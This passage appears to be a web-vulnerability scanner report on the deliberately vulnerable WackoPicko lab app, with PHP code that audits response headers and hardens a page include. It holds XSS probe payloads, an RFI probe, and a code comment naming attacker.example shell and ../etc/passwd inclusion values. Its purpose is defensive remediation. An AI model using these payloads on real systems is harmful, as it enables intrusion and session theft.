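// --- Check: audit raw response header lines the way the scanner does ---------
/**
 * @param string[] $headerLines e.g. ["Set-Cookie: PHPSESSID=abc; path=/", ...]
 * @param bool     $https       whether the response was served over TLS
 * @return string[] finding titles that would be raised for this response
 */
function audit_headers(array $headerLines, bool $https): array
{
    $findings = [];
    $seen = [];                        // lower-cased header name => [values]
    foreach ($headerLines as $line) {
        if (strpos($line, ':') === false) {
            continue;                  // status line or malformed line
        }
        [$name, $value] = explode(':', $line, 2);
        $seen[strtolower(trim($name))][] = trim($value);
    }

    foreach ($seen['set-cookie'] ?? [] as $cookie) {
        $parts = explode(';', $cookie);
        $cookieName = trim(explode('=', $parts[0], 2)[0]);
        // Attributes after the first ';' are case-insensitive tokens.
        $attrs = array_map(
            static fn(string $a): string => strtolower(trim($a)),
            array_slice($parts, 1)
        );
        if (!in_array('httponly', $attrs, true)) {
            $findings[] = "Cookie set without HttpOnly flag: $cookieName";
        }
        // A missing Secure flag only matters once the site is served over TLS.
        if ($https && !in_array('secure', $attrs, true)) {
            $findings[] = "Cookie set without Secure flag: $cookieName";
        }
    }

    if (strtolower($seen['x-content-type-options'][0] ?? '') !== 'nosniff') {
        $findings[] = 'X-Content-Type-Options header missing';
    }
    if (empty($seen['x-frame-options'])) {
        $findings[] = 'X-Frame-Options header not set';
    }
    return $findings;
}

// Constructed sample: the shape of the responses flagged in this report.
$before = [
    'HTTP/1.1 200 OK',
    'Content-Type: text/html',
    'Set-Cookie: PHPSESSID=example; path=/',
];
// Constructed sample: the same response after harden_response() has run.
$after = [
    'HTTP/1.1 200 OK',
    'Content-Type: text/html; charset=UTF-8',
    'Set-Cookie: PHPSESSID=example; path=/; secure; HttpOnly; SameSite=Lax',
    'X-Content-Type-Options: nosniff',
    'X-Frame-Options: DENY',
    "Content-Security-Policy: frame-ancestors 'none'",
];

print_r(audit_headers($before, false)); // the three findings from this report
print_r(audit_headers($after, false));  // empty array
```

To confirm the cookie fix in a browser, open the developer console on any page of the site and evaluate document.cookie: PHPSESSID must no longer appear in it. The scan above ran over plain HTTP, so the Secure flag check is deliberately gated on the scheme; it becomes a real finding the moment the site moves to HTTPS.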

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=login
Parameter
PHPSESSID=ovvaaugjeudalu2egf6c0ok9r7; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/passcheck.php
Parameter
PHPSESSID=almbndb9qocrjo1n55i0n69av3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395013016
Parameter
PHPSESSID=s39d3eb75c2h9njn0he4p18mi2; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395013016

Solution

Browsers that honour this header (originally Internet Explorer 8 and Google Chrome; all current major browsers do) will not MIME-sniff a response away from its declared type. Ensure each response sets an accurate Content-Type header and also X-Content-Type-Options: nosniff, so that the browser does not guess a different type from the body (for example, rendering a text/plain or image response as HTML or script).

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395013016

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099416
Parameter
PHPSESSID=8mln0d8dmd8heusmaf3i85k6b5; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099416

Solution

Browsers that honour this header (originally Internet Explorer 8 and Google Chrome; all current major browsers do) will not MIME-sniff a response away from its declared type. Ensure each response sets an accurate Content-Type header and also X-Content-Type-Options: nosniff, so that the browser does not guess a different type from the body (for example, rendering a text/plain or image response as HTML or script).

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395099416

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185816
Parameter
PHPSESSID=2lfiemor34h4vrnb8g8givi7p3; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185816

Solution

Browsers that honour this header (originally Internet Explorer 8 and Google Chrome; all current major browsers do) will not MIME-sniff a response away from its declared type. Ensure each response sets an accurate Content-Type header and also X-Content-Type-Options: nosniff, so that the browser does not guess a different type from the body (for example, rendering a text/plain or image response as HTML or script).

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395185816

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272216
Parameter
PHPSESSID=2l1uhu0mp36civmd4a6g4fh480; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272216

Solution

Browsers that honour this header (originally Internet Explorer 8 and Google Chrome; all current major browsers do) will not MIME-sniff a response away from its declared type. Ensure each response sets an accurate Content-Type header and also X-Content-Type-Options: nosniff, so that the browser does not guess a different type from the body (for example, rendering a text/plain or image response as HTML or script).

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395272216

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358616
Parameter
PHPSESSID=o9814ldp10lnb58c6qguv779e4; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358616

Solution

Browsers that honour this header (originally Internet Explorer 8 and Google Chrome; all current major browsers do) will not MIME-sniff a response away from its declared type. Ensure each response sets an accurate Content-Type header and also X-Content-Type-Options: nosniff, so that the browser does not guess a different type from the body (for example, rendering a text/plain or image response as HTML or script).

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395358616

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395445016
Parameter
PHPSESSID=ssh9j73p2ld9iv6cc3ue2fcvi1; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395445016

Solution

Browsers that honour this header (originally Internet Explorer 8 and Google Chrome; all current major browsers do) will not MIME-sniff a response away from its declared type. Ensure each response sets an accurate Content-Type header and also X-Content-Type-Options: nosniff, so that the browser does not guess a different type from the body (for example, rendering a text/plain or image response as HTML or script).

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395445016

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531416
Parameter
PHPSESSID=6igta2os37mua6bb7sb7aed9c0; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531416

Solution

Browsers that honour this header (originally Internet Explorer 8 and Google Chrome; all current major browsers do) will not MIME-sniff a response away from its declared type. Ensure each response sets an accurate Content-Type header and also X-Content-Type-Options: nosniff, so that the browser does not guess a different type from the body (for example, rendering a text/plain or image response as HTML or script).

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395531416

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

Low (Warning)Cookie set without HttpOnly flag

Description

A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617816
Parameter
PHPSESSID=ro2nqfa7k1rslovsu8gjlgl836; path=/

Solution

Ensure that the HttpOnly flag is set for all cookies.

Reference

www.owasp.org/index.php/HttpOnly

WASC Id

13

Low (Warning)X-Content-Type-Options header missing

Description

The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617816

Solution

Browsers that honour this header (originally Internet Explorer 8 and Google Chrome; all current major browsers do) will not MIME-sniff a response away from its declared type. Ensure each response sets an accurate Content-Type header and also X-Content-Type-Options: nosniff, so that the browser does not guess a different type from the body (for example, rendering a text/plain or image response as HTML or script).

Reference

Informational (Warning)X-Frame-Options header not set

Description

X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks

URL
http://192.168.91.131/WackoPicko/calendar.php?date=1395617816

Solution

Most modern Web browsers support the X-Frame-Options HTTP header, ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY).

Reference

http://blogs.msdn.com/b/ieinternals/archive/2010/03/30/combating-clickjacking-with-x-frame-options.aspx?Redirected=true

High (Warning)Remote File Inclusion

Description

Remote File Include (RFI) is an attack technique used to exploit "dynamic file include" mechanisms in web applications. When web applications take user input (URL, parameter value, etc.) and pass them into file include commands, the web application might be tricked into including remote files with malicious code.

Almost all web application frameworks support file inclusion. File inclusion is mainly used for packaging common code into separate files that are later referenced by main application modules. When a web application references an include file, the code in this file may be executed implicitly or explicitly by calling specific procedures. If the choice of module to load is based on elements from the HTTP request, the web application might be vulnerable to RFI.

An attacker can use RFI for:

* Running malicious code on the server: any code in the included malicious files will be run by the server. If the file include is not executed using some wrapper, code in include files is executed in the context of the server user. This could lead to a complete system compromise.

* Running malicious code on clients: the attacker's malicious code can manipulate the content of the response sent to the client. The attacker can embed malicious code in the response that will be run by the client (for example, Javascript to steal the client session cookies).

PHP is particularly vulnerable to RFI attacks due to the extensive use of "file includes" in PHP programming and due to default server configurations that increase susceptibility to an RFI attack.

URL
http://192.168.91.131/WackoPicko/admin/index.php?page=http%3A%2F%2Fwww.google.com%3A80%2Fsearch%3Fq%3DOWASP%2520ZAP
Parameter
page
Attack
page=http://www.google.com:80/search?q=OWASP%20ZAP (the URL-decoded value of the page parameter in the request above). The response contained <title>OWASP ZAP.php - Google Search</title>, that is, Google's own result page for a query of "OWASP ZAP.php": the server fetched the supplied URL and included its output, appending ".php" to the parameter value before doing so.

Solution

Phase: Architecture and Design

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability.

Phases: Architecture and Design; Operation

Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

For PHP, the interpreter offers restrictions such as open_basedir, which can make it more difficult for an attacker to escape out of the application (safe_mode, which older guidance also lists, was removed in PHP 5.4). The setting that directly governs this finding is allow_url_include: when it is Off (the default since PHP 5.2), include and require refuse http://, ftp://, data:// and php://input sources, and the remote fetch observed above could not have happened; allow_url_fopen should also be disabled unless the application needs it. Note that this does not remove the underlying weakness, since the same parameter can still be used for local file inclusion. Also consider Suhosin, a hardened PHP extension that disables some of the more dangerous PHP features, bearing in mind that it targets PHP 5 and is not maintained for current releases.

Phase: Implementation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

For filenames, use stringent whitelists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434.

Phases: Architecture and Design; Operation

Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.

This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce your attack surface.

Phases: Architecture and Design; Implementation

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components.
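The following is an added example, not WackoPicko's code. The vulnerable function reconstructs the pattern the evidence above points to (a page parameter concatenated with ".php" and handed to include), and the hardened function applies the fixed-ID-to-filename mapping recommended in the first phase of the solution. The page keys, file names and the use of realpath as a second check are assumptions for illustration; the attack value is the URL-decoded one from the finding.

```php
<?php
// Added example (not WackoPicko's code). The vulnerable function reconstructs
// the pattern the finding's evidence implies: a page parameter concatenated
// with ".php" and passed to include(). The hardened version applies the
// fixed-key-to-filename mapping from the solution above. Page keys and file
// names are assumptions for illustration.

declare(strict_types=1);

// --- Vulnerable: include(user-controlled . '.php') ---------------------------
// With allow_url_include=On, ?page=http://attacker.example/shell makes the
// server fetch and execute http://attacker.example/shell.php. With it Off,
// values such as ../../../etc/passwd still give local file inclusion, and on
// PHP < 5.3.4 a trailing %00 cut off the ".php" suffix entirely.
function load_admin_page_vulnerable(string $page): string
{
    return $page . '.php';   // the exact argument include() would receive
}

// --- Hardened: fixed map, reject everything else -----------------------------
const ADMIN_PAGES = [
    'login' => 'admin/login.php',
    'home'  => 'admin/home.php',
    'users' => 'admin/users.php',
];

/**
 * Returns the absolute path of the module to include, or null when the
 * request does not name one of the known pages. Nothing from the request is
 * ever used to build a path; the key only selects an entry of the map.
 */
function resolve_admin_page(string $page): ?string
{
    if (!array_key_exists($page, ADMIN_PAGES)) {
        return null;                    // unknown key: deny, do not "clean up"
    }
    $path = realpath(__DIR__ . '/' . ADMIN_PAGES[$page]);
    // Defence in depth: the resolved file must still live under the app root.
    $root = realpath(__DIR__) . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $root, strlen($root)) !== 0) {
        return null;
    }
    return $path;
}

// Dispatcher as it would be used in admin/index.php:
//   $path = resolve_admin_page($_GET['page'] ?? 'login');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;

// Demonstration with the URL-decoded attack value from the finding above.
$attack = 'http://www.google.com:80/search?q=OWASP ZAP';

echo load_admin_page_vulnerable($attack), PHP_EOL;
// http://www.google.com:80/search?q=OWASP ZAP.php
// (a remote URL with ".php" appended, matching the title the scanner saw)

var_dump(resolve_admin_page($attack));  // NULL: rejected before any include()
var_dump(resolve_admin_page('login'));  // path to admin/login.php, or NULL if absent
```

The map makes the set of includable files finite and visible in one place, which is what allows a reviewer to sign it off; the realpath check is only insurance against a future edit that puts something request-derived into the map's values. Keep the reject branch a hard failure: attempts to strip "http://" or "../" from the input and carry on are what the blacklist warning in the implementation phase above is about.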

Reference

http://projects.webappsec.org/Remote-File-Inclusion

http://cwe.mitre.org/data/definitions/98.html

CWE Id

98

WASC Id

5

High (Warning)Cross Site Scripting (Reflected)

Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it is stored for a period of time. Favorite targets include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site or link (e.g. an attacker site or a malicious link sent via email); they need only view the web page containing the code.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
comment
Attack
</p><script>alert(1);</script><p>

Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

Reference

http://projects.webappsec.org/Cross-Site-Scripting

http://cwe.mitre.org/data/definitions/79.html

CWE Id

79

WASC Id

8

High (Warning) Cross Site Scripting (Reflected)

Description

Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.

When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have their account hijacked (cookie theft), their browser redirected to another location, or be shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone, allowing for system compromise.

There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.

Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form which, when posted to the vulnerable site, will mount the attack. A malicious form is typically used when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Once the malicious link is clicked or the malicious form is submitted, the XSS payload is echoed back, interpreted by the user's browser and executed. Another technique for sending almost arbitrary requests (GET and POST) is to use an embedded client, such as Adobe Flash.

Persistent attacks occur when the malicious code is submitted to a web site where it is stored for a period of time. Favorite targets include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site or link (e.g. an attacker site or a malicious link sent via email); they need only view the web page containing the code.

URL
http://192.168.91.131/WackoPicko/guestbook.php
Parameter
User-Agent
Attack
</p><script>alert(1);</script><p>

Solution

Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

Phases: Implementation; Architecture and Design

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

